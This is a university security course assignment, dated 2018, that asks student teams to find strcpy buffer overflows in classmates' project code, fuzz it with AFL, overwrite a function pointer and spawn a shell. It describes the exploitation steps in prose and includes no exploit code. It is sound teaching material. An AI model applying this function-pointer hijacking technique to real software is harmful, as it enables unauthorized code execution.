Due Date: Sat April 7, 2018 at 11:59pm.
In this project, you will work in teams (generally pairs) to look for and exploit vulnerabilities in other students' code.
Goal: The goal is to locate a vulnerability and overwrite a function pointer with an address that to launch a shell (code provided in cmpsc497-util.c).
Inputs: I have given each team one project submission that still has strcpy functions in it, so I would suggest studying how those calls are used. I would expect that you can craft an input that that can overflow a strcpy. In addition, you can also leverage AFL to identify crashes in the program.
Extra Credit: For extra credit (25 points), you will need to craft an exploit to launch a shell for submissions that do not contain strcpy. I suggest running AFL on those submissions. Let me know if you want to try the extra credit assignment, and I will supply that code.
Task 0 - Setup: Add code to set the function pointers in struct A (see cmpsc497-formatX.h for the definition) to NULL when objects of struct A are created, probably be set_object (for "set") and unmarshall (for "get").
Task 1 - Identify Overflows: Next, identify buffer overflows (seg fault crashes) in the project code by supplying an input that will cause the program to crash due to an overflow.
Task 2 - Detect Overflow: Add code to the project file that will print a message that you have changed a struct A function pointer to a non-null value, that only runs when the function pointer value is non-null.
Task 3 - Perform Overflow: Then, produce input that will overflow the function pointer value, such that the printf statement in Task 2 will be run.
Task 4 - Invoke Shell: Finally, add code that will call the function pointer and provide input that will invoke the shell.
Teams:
Rasmussen and Betts
Drummond and Li
Barczinski, Bhogale, and Palmer
Norris and Rabbitz
Makwana and Lee
Mettler and Shringarputale
Johnson and Gleason
Pinto and Levine
Submit all the project code (including Makefile) necessary to build and run your exploit and an input (in a separate file) that reaches the furthest task. Also, please provide a README with instructions for me to run the input.
Ensure that your code runs correctly on machines in the in the CSE Linux Lab. Any one of these machines will be sufficient - cse-p204instXX.cse.psu.edu, which XX is a 2-digit number from 01 to at least 40.
There will be a dropbox created on Canvas to submit your code, input, and README to the Canvas dropbox by 11:59pm on Sat April 7, 2018.
You are to complete this project only with your team members. We will create a Piazza forum, and the only allowed sharing of project information is through that forum. Do not discuss this project with anyone outside of Piazza.